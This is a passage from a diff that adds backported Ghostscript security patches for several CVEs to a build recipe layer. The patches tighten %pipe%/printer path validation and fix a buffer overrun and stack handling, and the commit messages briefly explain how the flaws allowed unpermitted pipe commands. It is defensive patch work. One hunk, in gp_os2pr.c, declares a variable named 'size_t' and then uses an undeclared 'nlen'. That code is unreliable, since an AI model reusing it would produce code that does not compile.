18 | 1 file changed, 1 insertion(+), 1 deletion(-) | ||
19 | |||
20 | diff --git a/base/gslibctx.c b/base/gslibctx.c | ||
21 | index ff8fc895e..63dfbe2e0 100644 | ||
22 | --- a/base/gslibctx.c | ||
23 | +++ b/base/gslibctx.c | ||
24 | @@ -668,10 +668,10 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname) | ||
25 | code = gs_add_control_path(mem, gs_permit_file_writing, f); | ||
26 | if (code < 0) | ||
27 | return code; | ||
28 | - break; | ||
29 | code = gs_add_control_path(mem, gs_permit_file_control, f); | ||
30 | if (code < 0) | ||
31 | return code; | ||
32 | + break; | ||
33 | } | ||
34 | if (!IS_WHITESPACE(f[i])) | ||
35 | break; | ||
36 | -- | ||
37 | 2.25.1 | ||
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_3.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_3.patch new file mode 100644 index 0000000000..e3f9e81c45 --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_3.patch | |||
@@ -0,0 +1,238 @@ | |||
1 | From a9bd3dec9fde03327a4a2c69dad1036bf9632e20 Mon Sep 17 00:00:00 2001 | ||
2 | From: Chris Liddell <chris.liddell@artifex.com> | ||
3 | Date: Tue, 7 Sep 2021 20:36:12 +0100 | ||
4 | Subject: [PATCH] Bug 704342: Include device specifier strings in access | ||
5 | validation | ||
6 | |||
7 | for the "%pipe%", %handle%" and %printer% io devices. | ||
8 | |||
9 | We previously validated only the part after the "%pipe%" Postscript device | ||
10 | specifier, but this proved insufficient. | ||
11 | |||
12 | This rebuilds the original file name string, and validates it complete. The | ||
13 | slight complication for "%pipe%" is it can be reached implicitly using | ||
14 | "|" so we have to check both prefixes. | ||
15 | |||
16 | Addresses CVE-2021-3781 | ||
17 | |||
18 | CVE: CVE-2021-3781 | ||
19 | |||
20 | Upstream-Status: Backport: | ||
21 | https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a9bd3dec9fde | ||
22 | |||
23 | Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com> | ||
24 | --- | ||
25 | base/gdevpipe.c | 22 +++++++++++++++- | ||
26 | base/gp_mshdl.c | 11 +++++++- | ||
27 | base/gp_msprn.c | 10 ++++++- | ||
28 | base/gp_os2pr.c | 13 +++++++++- | ||
29 | base/gslibctx.c | 69 ++++++++++--------------------------------------- | ||
30 | 5 files changed, 65 insertions(+), 60 deletions(-) | ||
31 | |||
32 | diff --git a/base/gdevpipe.c b/base/gdevpipe.c | ||
33 | index 96d71f5d8..5bdc485be 100644 | ||
34 | --- a/base/gdevpipe.c | ||
35 | +++ b/base/gdevpipe.c | ||
36 | @@ -72,8 +72,28 @@ pipe_fopen(gx_io_device * iodev, const char *fname, const char *access, | ||
37 | #else | ||
38 | gs_lib_ctx_t *ctx = mem->gs_lib_ctx; | ||
39 | gs_fs_list_t *fs = ctx->core->fs; | ||
40 | + /* The pipe device can be reached in two ways, explicltly with %pipe% | ||
41 | + or implicitly with "|", so we have to check for both | ||
42 | + */ | ||
43 | + char f[gp_file_name_sizeof]; | ||
44 | + const char *pipestr = "|"; | ||
45 | + const size_t pipestrlen = strlen(pipestr); | ||
46 | + const size_t preflen = strlen(iodev->dname); | ||
47 | + const size_t nlen = strlen(fname); | ||
48 | + int code1; | ||
49 | + | ||
50 | + if (preflen + nlen >= gp_file_name_sizeof) | ||
51 | + return_error(gs_error_invalidaccess); | ||
52 | + | ||
53 | + memcpy(f, iodev->dname, preflen); | ||
54 | + memcpy(f + preflen, fname, nlen + 1); | ||
55 | + | ||
56 | + code1 = gp_validate_path(mem, f, access); | ||
57 | + | ||
58 | + memcpy(f, pipestr, pipestrlen); | ||
59 | + memcpy(f + pipestrlen, fname, nlen + 1); | ||
60 | |||
61 | - if (gp_validate_path(mem, fname, access) != 0) | ||
62 | + if (code1 != 0 && gp_validate_path(mem, f, access) != 0 ) | ||
63 | return gs_error_invalidfileaccess; | ||
64 | |||
65 | /* | ||
66 | diff --git a/base/gp_mshdl.c b/base/gp_mshdl.c | ||
67 | index 2b964ed74..8d87ceadc 100644 | ||
68 | --- a/base/gp_mshdl.c | ||
69 | +++ b/base/gp_mshdl.c | ||
70 | @@ -95,8 +95,17 @@ mswin_handle_fopen(gx_io_device * iodev, const char *fname, const char *access, | ||
71 | long hfile; /* Correct for Win32, may be wrong for Win64 */ | ||
72 | gs_lib_ctx_t *ctx = mem->gs_lib_ctx; | ||
73 | gs_fs_list_t *fs = ctx->core->fs; | ||
74 | + char f[gp_file_name_sizeof]; | ||
75 | + const size_t preflen = strlen(iodev->dname); | ||
76 | + const size_t nlen = strlen(fname); | ||
77 | |||
78 | - if (gp_validate_path(mem, fname, access) != 0) | ||
79 | + if (preflen + nlen >= gp_file_name_sizeof) | ||
80 | + return_error(gs_error_invalidaccess); | ||
81 | + | ||
82 | + memcpy(f, iodev->dname, preflen); | ||
83 | + memcpy(f + preflen, fname, nlen + 1); | ||
84 | + | ||
85 | + if (gp_validate_path(mem, f, access) != 0) | ||
86 | return gs_error_invalidfileaccess; | ||
87 | |||
88 | /* First we try the open_handle method. */ | ||
89 | diff --git a/base/gp_msprn.c b/base/gp_msprn.c | ||
90 | index ed4827968..746a974f7 100644 | ||
91 | --- a/base/gp_msprn.c | ||
92 | +++ b/base/gp_msprn.c | ||
93 | @@ -168,8 +168,16 @@ mswin_printer_fopen(gx_io_device * iodev, const char *fname, const char *access, | ||
94 | unsigned long *ptid = &((tid_t *)(iodev->state))->tid; | ||
95 | gs_lib_ctx_t *ctx = mem->gs_lib_ctx; | ||
96 | gs_fs_list_t *fs = ctx->core->fs; | ||
97 | + const size_t preflen = strlen(iodev->dname); | ||
98 | + const size_t nlen = strlen(fname); | ||
99 | |||
100 | - if (gp_validate_path(mem, fname, access) != 0) | ||
101 | + if (preflen + nlen >= gp_file_name_sizeof) | ||
102 | + return_error(gs_error_invalidaccess); | ||
103 | + | ||
104 | + memcpy(pname, iodev->dname, preflen); | ||
105 | + memcpy(pname + preflen, fname, nlen + 1); | ||
106 | + | ||
107 | + if (gp_validate_path(mem, pname, access) != 0) | ||
108 | return gs_error_invalidfileaccess; | ||
109 | |||
110 | /* First we try the open_printer method. */ | ||
111 | diff --git a/base/gp_os2pr.c b/base/gp_os2pr.c | ||
112 | index f852c71fc..ba54cde66 100644 | ||
113 | --- a/base/gp_os2pr.c | ||
114 | +++ b/base/gp_os2pr.c | ||
115 | @@ -107,9 +107,20 @@ os2_printer_fopen(gx_io_device * iodev, const char *fname, const char *access, | ||
116 | FILE ** pfile, char *rfname, uint rnamelen) | ||
117 | { | ||
118 | os2_printer_t *pr = (os2_printer_t *)iodev->state; | ||
119 | - char driver_name[256]; | ||
120 | + char driver_name[gp_file_name_sizeof]; | ||
121 | gs_lib_ctx_t *ctx = mem->gs_lib_ctx; | ||
122 | gs_fs_list_t *fs = ctx->core->fs; | ||
123 | + const size_t preflen = strlen(iodev->dname); | ||
124 | + const int size_t = strlen(fname); | ||
125 | + | ||
126 | + if (preflen + nlen >= gp_file_name_sizeof) | ||
127 | + return_error(gs_error_invalidaccess); | ||
128 | + | ||
129 | + memcpy(driver_name, iodev->dname, preflen); | ||
130 | + memcpy(driver_name + preflen, fname, nlen + 1); | ||
131 | + | ||
132 | + if (gp_validate_path(mem, driver_name, access) != 0) | ||
133 | + return gs_error_invalidfileaccess; | ||
134 | |||
135 | /* First we try the open_printer method. */ | ||
136 | /* Note that the loop condition here ensures we don't | ||
137 | diff --git a/base/gslibctx.c b/base/gslibctx.c | ||
138 | index 6dfed6cd5..318039fad 100644 | ||
139 | --- a/base/gslibctx.c | ||
140 | +++ b/base/gslibctx.c | ||
141 | @@ -655,82 +655,39 @@ rewrite_percent_specifiers(char *s) | ||
142 | int | ||
143 | gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname) | ||
144 | { | ||
145 | - char *fp, f[gp_file_name_sizeof]; | ||
146 | - const int pipe = 124; /* ASCII code for '|' */ | ||
147 | - const int len = strlen(fname); | ||
148 | - int i, code; | ||
149 | + char f[gp_file_name_sizeof]; | ||
150 | + int code; | ||
151 | |||
152 | /* Be sure the string copy will fit */ | ||
153 | - if (len >= gp_file_name_sizeof) | ||
154 | + if (strlen(fname) >= gp_file_name_sizeof) | ||
155 | return gs_error_rangecheck; | ||
156 | strcpy(f, fname); | ||
157 | - fp = f; | ||
158 | /* Try to rewrite any %d (or similar) in the string */ | ||
159 | rewrite_percent_specifiers(f); | ||
160 | - for (i = 0; i < len; i++) { | ||
161 | - if (f[i] == pipe) { | ||
162 | - fp = &f[i + 1]; | ||
163 | - /* Because we potentially have to check file permissions at two levels | ||
164 | - for the output file (gx_device_open_output_file and the low level | ||
165 | - fopen API, if we're using a pipe, we have to add both the full string, | ||
166 | - (including the '|', and just the command to which we pipe - since at | ||
167 | - the pipe_fopen(), the leading '|' has been stripped. | ||
168 | - */ | ||
169 | - code = gs_add_control_path(mem, gs_permit_file_writing, f); | ||
170 | - if (code < 0) | ||
171 | - return code; | ||
172 | - code = gs_add_control_path(mem, gs_permit_file_control, f); | ||
173 | - if (code < 0) | ||
174 | - return code; | ||
175 | - break; | ||
176 | - } | ||
177 | - if (!IS_WHITESPACE(f[i])) | ||
178 | - break; | ||
179 | - } | ||
180 | - code = gs_add_control_path(mem, gs_permit_file_control, fp); | ||
181 | + | ||
182 | + code = gs_add_control_path(mem, gs_permit_file_control, f); | ||
183 | if (code < 0) | ||
184 | return code; | ||
185 | - return gs_add_control_path(mem, gs_permit_file_writing, fp); | ||
186 | + return gs_add_control_path(mem, gs_permit_file_writing, f); | ||
187 | } | ||
188 | |||
189 | int | ||
190 | gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname) | ||
191 | { | ||
192 | - char *fp, f[gp_file_name_sizeof]; | ||
193 | - const int pipe = 124; /* ASCII code for '|' */ | ||
194 | - const int len = strlen(fname); | ||
195 | - int i, code; | ||
196 | + char f[gp_file_name_sizeof]; | ||
197 | + int code; | ||
198 | |||
199 | /* Be sure the string copy will fit */ | ||
200 | - if (len >= gp_file_name_sizeof) | ||
201 | + if (strlen(fname) >= gp_file_name_sizeof) | ||
202 | return gs_error_rangecheck; | ||
203 | strcpy(f, fname); | ||
204 | - fp = f; | ||
205 | /* Try to rewrite any %d (or similar) in the string */ | ||
206 | - for (i = 0; i < len; i++) { | ||
207 | - if (f[i] == pipe) { | ||
208 | - fp = &f[i + 1]; | ||
209 | - /* Because we potentially have to check file permissions at two levels | ||
210 | - for the output file (gx_device_open_output_file and the low level | ||
211 | - fopen API, if we're using a pipe, we have to add both the full string, | ||
212 | - (including the '|', and just the command to which we pipe - since at | ||
213 | - the pipe_fopen(), the leading '|' has been stripped. | ||
214 | - */ | ||
215 | - code = gs_remove_control_path(mem, gs_permit_file_writing, f); | ||
216 | - if (code < 0) | ||
217 | - return code; | ||
218 | - code = gs_remove_control_path(mem, gs_permit_file_control, f); | ||
219 | - if (code < 0) | ||
220 | - return code; | ||
221 | - break; | ||
222 | - } | ||
223 | - if (!IS_WHITESPACE(f[i])) | ||
224 | - break; | ||
225 | - } | ||
226 | - code = gs_remove_control_path(mem, gs_permit_file_control, fp); | ||
227 | + rewrite_percent_specifiers(f); | ||
228 | + | ||
229 | + code = gs_remove_control_path(mem, gs_permit_file_control, f); | ||
230 | if (code < 0) | ||
231 | return code; | ||
232 | - return gs_remove_control_path(mem, gs_permit_file_writing, fp); | ||
233 | + return gs_remove_control_path(mem, gs_permit_file_writing, f); | ||
234 | } | ||
235 | |||
236 | int | ||
237 | -- | ||
238 | 2.25.1 | ||
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch new file mode 100644 index 0000000000..f312f89e04 --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch | |||
@@ -0,0 +1,65 @@ | |||
1 | From 6643ff0cb837db3eade489ffff21e3e92eee2ae0 Mon Sep 17 00:00:00 2001 | ||
2 | From: Chris Liddell <chris.liddell@artifex.com> | ||
3 | Date: Fri, 28 Jan 2022 08:21:19 +0000 | ||
4 | Subject: [PATCH] [PATCH] Bug 703902: Fix op stack management in | ||
5 | sampled_data_continue() | ||
6 | |||
7 | Replace pop() (which does no checking, and doesn't handle stack extension | ||
8 | blocks) with ref_stack_pop() which does do all that. | ||
9 | |||
10 | We still use pop() in one case (it's faster), but we have to later use | ||
11 | ref_stack_pop() before calling sampled_data_sample() which also accesses the | ||
12 | op stack. | ||
13 | |||
14 | Fixes: | ||
15 | https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=34675 | ||
16 | |||
17 | Upstream-Status: Backported [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=2a3129365d3bc0d4a41f107ef175920d1505d1f7] | ||
18 | CVE: CVE-2021-45949 | ||
19 | Signed-off-by: Minjae Kim <flowergom@gmail.com> | ||
20 | --- | ||
21 | psi/zfsample.c | 13 ++++++++----- | ||
22 | 1 file changed, 8 insertions(+), 5 deletions(-) | ||
23 | |||
24 | diff --git a/psi/zfsample.c b/psi/zfsample.c | ||
25 | index 0023fa4..f84671f 100644 | ||
26 | --- a/psi/zfsample.c | ||
27 | +++ b/psi/zfsample.c | ||
28 | @@ -534,14 +534,17 @@ sampled_data_continue(i_ctx_t *i_ctx_p) | ||
29 | data_ptr[bps * i + j] = (byte)(cv >> ((bps - 1 - j) * 8)); /* MSB first */ | ||
30 | } | ||
31 | pop(num_out); /* Move op to base of result values */ | ||
32 | - | ||
33 | + /* From here on, we have to use ref_stack_pop() rather than pop() | ||
34 | + so that it handles stack extension blocks properly, before calling | ||
35 | + sampled_data_sample() which also uses the op stack. | ||
36 | + */ | ||
37 | /* Check if we are done collecting data. */ | ||
38 | |||
39 | if (increment_cube_indexes(params, penum->indexes)) { | ||
40 | if (stack_depth_adjust == 0) | ||
41 | - pop(O_STACK_PAD); /* Remove spare stack space */ | ||
42 | + ref_stack_pop(&o_stack, O_STACK_PAD); /* Remove spare stack space */ | ||
43 | else | ||
44 | - pop(stack_depth_adjust - num_out); | ||
45 | + ref_stack_pop(&o_stack, stack_depth_adjust - num_out); | ||
46 | /* Execute the closing procedure, if given */ | ||
47 | code = 0; | ||
48 | if (esp_finish_proc != 0) | ||
49 | @@ -554,11 +557,11 @@ sampled_data_continue(i_ctx_t *i_ctx_p) | ||
50 | if ((O_STACK_PAD - stack_depth_adjust) < 0) { | ||
51 | stack_depth_adjust = -(O_STACK_PAD - stack_depth_adjust); | ||
52 | check_op(stack_depth_adjust); | ||
53 | - pop(stack_depth_adjust); | ||
54 | + ref_stack_pop(&o_stack, stack_depth_adjust); | ||
55 | } | ||
56 | else { | ||
57 | check_ostack(O_STACK_PAD - stack_depth_adjust); | ||
58 | - push(O_STACK_PAD - stack_depth_adjust); | ||
59 | + ref_stack_push(&o_stack, O_STACK_PAD - stack_depth_adjust); | ||
60 | for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++) | ||
61 | make_null(op - i); | ||
62 | } | ||
63 | -- | ||
64 | 2.17.1 | ||
65 | |||
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-28879.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-28879.patch new file mode 100644 index 0000000000..852f2459f7 --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-28879.patch | |||
@@ -0,0 +1,54 @@ | |||
1 | From 37ed5022cecd584de868933b5b60da2e995b3179 Mon Sep 17 00:00:00 2001 | ||
2 | From: Ken Sharp <ken.sharp@artifex.com> | ||
3 | Date: Fri, 24 Mar 2023 13:19:57 +0000 | ||
4 | Subject: [PATCH] Graphics library - prevent buffer overrun in (T)BCP encoding | ||
5 | |||
6 | Bug #706494 "Buffer Overflow in s_xBCPE_process" | ||
7 | |||
8 | As described in detail in the bug report, if the write buffer is filled | ||
9 | to one byte less than full, and we then try to write an escaped | ||
10 | character, we overrun the buffer because we don't check before | ||
11 | writing two bytes to it. | ||
12 | |||
13 | This just checks if we have two bytes before starting to write an | ||
14 | escaped character and exits if we don't (replacing the consumed byte | ||
15 | of the input). | ||
16 | |||
17 | Up for further discussion; why do we even permit a BCP encoding filter | ||
18 | anyway ? I think we should remove this, at least when SAFER is true. | ||
19 | |||
20 | Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;h=37ed5022cecd584de868933b5b60da2e995b3179] | ||
21 | CVE: CVE-2023-28879 | ||
22 | Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> | ||
23 | --- | ||
24 | base/sbcp.c | 10 +++++++++- | ||
25 | 1 file changed, 9 insertions(+), 1 deletion(-) | ||
26 | |||
27 | diff --git a/base/sbcp.c b/base/sbcp.c | ||
28 | index 6b0383c..90784b5 100644 | ||
29 | --- a/base/sbcp.c | ||
30 | +++ b/base/sbcp.c | ||
31 | @@ -1,4 +1,4 @@ | ||
32 | -/* Copyright (C) 2001-2019 Artifex Software, Inc. | ||
33 | +/* Copyright (C) 2001-2023 Artifex Software, Inc. | ||
34 | All Rights Reserved. | ||
35 | |||
36 | This software is provided AS-IS with no warranty, either express or | ||
37 | @@ -50,6 +50,14 @@ s_xBCPE_process(stream_state * st, stream_cursor_read * pr, | ||
38 | byte ch = *++p; | ||
39 | |||
40 | if (ch <= 31 && escaped[ch]) { | ||
41 | + /* Make sure we have space to store two characters in the write buffer, | ||
42 | + * if we don't then exit without consuming the input character, we'll process | ||
43 | + * that on the next time round. | ||
44 | + */ | ||
45 | + if (pw->limit - q < 2) { | ||
46 | + p--; | ||
47 | + break; | ||
48 | + } | ||
49 | if (p == rlimit) { | ||
50 | p--; | ||
51 | break; | ||
52 | -- | ||
53 | 2.25.1 | ||
54 | |||
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-1.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-1.patch new file mode 100644 index 0000000000..a3bbe958eb --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-1.patch | |||
@@ -0,0 +1,145 @@ | |||
1 | From 5e65eeae225c7d02d447de5abaf4a8e6d234fcea Mon Sep 17 00:00:00 2001 | ||
2 | From: Chris Liddell <chris.liddell@artifex.com> | ||
3 | Date: Wed, 7 Jun 2023 10:23:06 +0100 | ||
4 | Subject: [PATCH] Bug 706761: Don't "reduce" %pipe% file names for permission validation | ||
5 | |||
6 | For regular file names, we try to simplfy relative paths before we use them. | ||
7 | |||
8 | Because the %pipe% device can, effectively, accept command line calls, we | ||
9 | shouldn't be simplifying that string, because the command line syntax can end | ||
10 | up confusing the path simplifying code. That can result in permitting a pipe | ||
11 | command which does not match what was originally permitted. | ||
12 | |||
13 | Special case "%pipe" in the validation code so we always deal with the entire | ||
14 | string. | ||
15 | |||
16 | Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=505eab7782b429017eb434b2b95120855f2b0e3c] | ||
17 | CVE: CVE-2023-36664 | ||
18 | Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> | ||
19 | --- | ||
20 | base/gpmisc.c | 31 +++++++++++++++++++-------- | ||
21 | base/gslibctx.c | 56 ++++++++++++++++++++++++++++++++++++------------- | ||
22 | 2 files changed, 64 insertions(+), 23 deletions(-) | ||
23 | |||
24 | diff --git a/base/gpmisc.c b/base/gpmisc.c | ||
25 | index c4fffae..09ac6b3 100644 | ||
26 | --- a/base/gpmisc.c | ||
27 | +++ b/base/gpmisc.c | ||
28 | @@ -1046,16 +1046,29 @@ gp_validate_path_len(const gs_memory_t *mem, | ||
29 | && !memcmp(path + cdirstrl, dirsepstr, dirsepstrl)) { | ||
30 | prefix_len = 0; | ||
31 | } | ||
32 | - rlen = len+1; | ||
33 | - bufferfull = (char *)gs_alloc_bytes(mem->thread_safe_memory, rlen + prefix_len, "gp_validate_path"); | ||
34 | - if (bufferfull == NULL) | ||
35 | - return gs_error_VMerror; | ||
36 | - | ||
37 | - buffer = bufferfull + prefix_len; | ||
38 | - if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success) | ||
39 | - return gs_error_invalidfileaccess; | ||
40 | - buffer[rlen] = 0; | ||
41 | |||
42 | + /* "%pipe%" do not follow the normal rules for path definitions, so we | ||
43 | + don't "reduce" them to avoid unexpected results | ||
44 | + */ | ||
45 | + if (len > 5 && memcmp(path, "%pipe", 5) != 0) { | ||
46 | + bufferfull = buffer = (char *)gs_alloc_bytes(mem->thread_safe_memory, len + 1, "gp_validate_path"); | ||
47 | + if (buffer == NULL) | ||
48 | + return gs_error_VMerror; | ||
49 | + memcpy(buffer, path, len); | ||
50 | + buffer[len] = 0; | ||
51 | + rlen = len; | ||
52 | + } | ||
53 | + else { | ||
54 | + rlen = len+1; | ||
55 | + bufferfull = (char *)gs_alloc_bytes(mem->thread_safe_memory, rlen + prefix_len, "gp_validate_path"); | ||
56 | + if (bufferfull == NULL) | ||
57 | + return gs_error_VMerror; | ||
58 | + | ||
59 | + buffer = bufferfull + prefix_len; | ||
60 | + if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success) | ||
61 | + return gs_error_invalidfileaccess; | ||
62 | + buffer[rlen] = 0; | ||
63 | + } | ||
64 | while (1) { | ||
65 | switch (mode[0]) | ||
66 | { | ||
67 | diff --git a/base/gslibctx.c b/base/gslibctx.c | ||
68 | index 20c5eee..355c0e3 100644 | ||
69 | --- a/base/gslibctx.c | ||
70 | +++ b/base/gslibctx.c | ||
71 | @@ -719,14 +719,28 @@ gs_add_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const ch | ||
72 | return gs_error_rangecheck; | ||
73 | } | ||
74 | |||
75 | - rlen = len+1; | ||
76 | - buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gp_validate_path"); | ||
77 | - if (buffer == NULL) | ||
78 | - return gs_error_VMerror; | ||
79 | + /* "%pipe%" do not follow the normal rules for path definitions, so we | ||
80 | + don't "reduce" them to avoid unexpected results | ||
81 | + */ | ||
82 | + if (len > 5 && memcmp(path, "%pipe", 5) != 0) { | ||
83 | + buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_add_control_path_len"); | ||
84 | + if (buffer == NULL) | ||
85 | + return gs_error_VMerror; | ||
86 | + memcpy(buffer, path, len); | ||
87 | + buffer[len] = 0; | ||
88 | + rlen = len; | ||
89 | + } | ||
90 | + else { | ||
91 | + rlen = len + 1; | ||
92 | |||
93 | - if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success) | ||
94 | - return gs_error_invalidfileaccess; | ||
95 | - buffer[rlen] = 0; | ||
96 | + buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gs_add_control_path_len"); | ||
97 | + if (buffer == NULL) | ||
98 | + return gs_error_VMerror; | ||
99 | + | ||
100 | + if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success) | ||
101 | + return gs_error_invalidfileaccess; | ||
102 | + buffer[rlen] = 0; | ||
103 | + } | ||
104 | |||
105 | n = control->num; | ||
106 | for (i = 0; i < n; i++) | ||
107 | @@ -802,14 +816,28 @@ gs_remove_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const | ||
108 | return gs_error_rangecheck; | ||
109 | } | ||
110 | |||
111 | - rlen = len+1; | ||
112 | - buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gp_validate_path"); | ||
113 | - if (buffer == NULL) | ||
114 | - return gs_error_VMerror; | ||
115 | + /* "%pipe%" do not follow the normal rules for path definitions, so we | ||
116 | + don't "reduce" them to avoid unexpected results | ||
117 | + */ | ||
118 | + if (len > 5 && memcmp(path, "%pipe", 5) != 0) { | ||
119 | + buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_remove_control_path_len"); | ||
120 | + if (buffer == NULL) | ||
121 | + return gs_error_VMerror; | ||
122 | + memcpy(buffer, path, len); | ||
123 | + buffer[len] = 0; | ||
124 | + rlen = len; | ||
125 | + } | ||
126 | + else { | ||
127 | + rlen = len+1; | ||
128 | |||
129 | - if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success) | ||
130 | - return gs_error_invalidfileaccess; | ||
131 | - buffer[rlen] = 0; | ||
132 | + buffer = (char *)gs_alloc_bytes(core->memory, rlen, "gs_remove_control_path_len"); | ||
133 | + if (buffer == NULL) | ||
134 | + return gs_error_VMerror; | ||
135 | + | ||
136 | + if (gp_file_name_reduce(path, (uint)len, buffer, &rlen) != gp_combine_success) | ||
137 | + return gs_error_invalidfileaccess; | ||
138 | + buffer[rlen] = 0; | ||
139 | + } | ||
140 | |||
141 | n = control->num; | ||
142 | for (i = 0; i < n; i++) { | ||
143 | -- | ||
144 | 2.25.1 | ||
145 | |||
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-2.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-2.patch new file mode 100644 index 0000000000..e8c42f1deb --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-2.patch | |||
@@ -0,0 +1,60 @@ | |||
1 | From fb342fdb60391073a69147cb71af1ac416a81099 Mon Sep 17 00:00:00 2001 | ||
2 | From: Chris Liddell <chris.liddell@artifex.com> | ||
3 | Date: Wed, 14 Jun 2023 09:08:12 +0100 | ||
4 | Subject: [PATCH] Bug 706778: 706761 revisit | ||
5 | |||
6 | Two problems with the original commit. The first a silly typo inverting the | ||
7 | logic of a test. | ||
8 | |||
9 | The second was forgetting that we actually actually validate two candidate | ||
10 | strings for pipe devices. One with the expected "%pipe%" prefix, the other | ||
11 | using the pipe character prefix: "|". | ||
12 | |||
13 | This addresses both those. | ||
14 | |||
15 | Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=fb342fdb60391073a69147cb71af1ac416a81099] | ||
16 | CVE: CVE-2023-36664 | ||
17 | Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> | ||
18 | --- | ||
19 | base/gpmisc.c | 2 +- | ||
20 | base/gslibctx.c | 4 ++-- | ||
21 | 2 files changed, 3 insertions(+), 3 deletions(-) | ||
22 | |||
23 | diff --git a/base/gpmisc.c b/base/gpmisc.c | ||
24 | index 09ac6b3..01d449f 100644 | ||
25 | --- a/base/gpmisc.c | ||
26 | +++ b/base/gpmisc.c | ||
27 | @@ -1050,7 +1050,7 @@ gp_validate_path_len(const gs_memory_t *mem, | ||
28 | /* "%pipe%" do not follow the normal rules for path definitions, so we | ||
29 | don't "reduce" them to avoid unexpected results | ||
30 | */ | ||
31 | - if (len > 5 && memcmp(path, "%pipe", 5) != 0) { | ||
32 | + if (path[0] == '|' || (len > 5 && memcmp(path, "%pipe", 5) == 0)) { | ||
33 | bufferfull = buffer = (char *)gs_alloc_bytes(mem->thread_safe_memory, len + 1, "gp_validate_path"); | ||
34 | if (buffer == NULL) | ||
35 | return gs_error_VMerror; | ||
36 | diff --git a/base/gslibctx.c b/base/gslibctx.c | ||
37 | index 355c0e3..d8f74a3 100644 | ||
38 | --- a/base/gslibctx.c | ||
39 | +++ b/base/gslibctx.c | ||
40 | @@ -722,7 +722,7 @@ gs_add_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const ch | ||
41 | /* "%pipe%" do not follow the normal rules for path definitions, so we | ||
42 | don't "reduce" them to avoid unexpected results | ||
43 | */ | ||
44 | - if (len > 5 && memcmp(path, "%pipe", 5) != 0) { | ||
45 | + if (path[0] == '|' || (len > 5 && memcmp(path, "%pipe", 5) == 0)) { | ||
46 | buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_add_control_path_len"); | ||
47 | if (buffer == NULL) | ||
48 | return gs_error_VMerror; | ||
49 | @@ -819,7 +819,7 @@ gs_remove_control_path_len(const gs_memory_t *mem, gs_path_control_t type, const | ||
50 | /* "%pipe%" do not follow the normal rules for path definitions, so we | ||
51 | don't "reduce" them to avoid unexpected results | ||
52 | */ | ||
53 | - if (len > 5 && memcmp(path, "%pipe", 5) != 0) { | ||
54 | + if (path[0] == '|' || (len > 5 && memcmp(path, "%pipe", 5) == 0)) { | ||
55 | buffer = (char *)gs_alloc_bytes(core->memory, len + 1, "gs_remove_control_path_len"); | ||
56 | if (buffer == NULL) | ||
57 | return gs_error_VMerror; | ||
58 | -- | ||
59 | 2.25.1 | ||
60 | |||
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-pre1.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-pre1.patch new file mode 100644 index 0000000000..662736bb3d --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-pre1.patch | |||
@@ -0,0 +1,62 @@ | |||
1 | From 4ceaf92815302863a8c86fcfcf2347e0118dd3a5 Mon Sep 17 00:00:00 2001 | ||
2 | From: Ray Johnston <ray.johnston@artifex.com> | ||
3 | Date: Tue, 22 Sep 2020 13:10:04 -0700 | ||
4 | Subject: [PATCH] Fix gp_file allocations to use thread_safe_memory. | ||
5 | |||
6 | The gpmisc.c does allocations for gp_file objects and buffers used by | ||
7 | gp_fprintf, as well as gp_validate_path_len. The helgrind run with | ||
8 | -dBGPrint -dNumRenderingThreads=4 and PCL input showed up the gp_fprintf | ||
9 | problem since the clist rendering would call gp_fprintf using the same | ||
10 | allocator (PCL's chunk allocator which is non_gc_memory). The chunk | ||
11 | allocator is intentionally not thread safe (for performance). | ||
12 | |||
13 | Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=4ceaf92815302863a8c86fcfcf2347e0118dd3a5] | ||
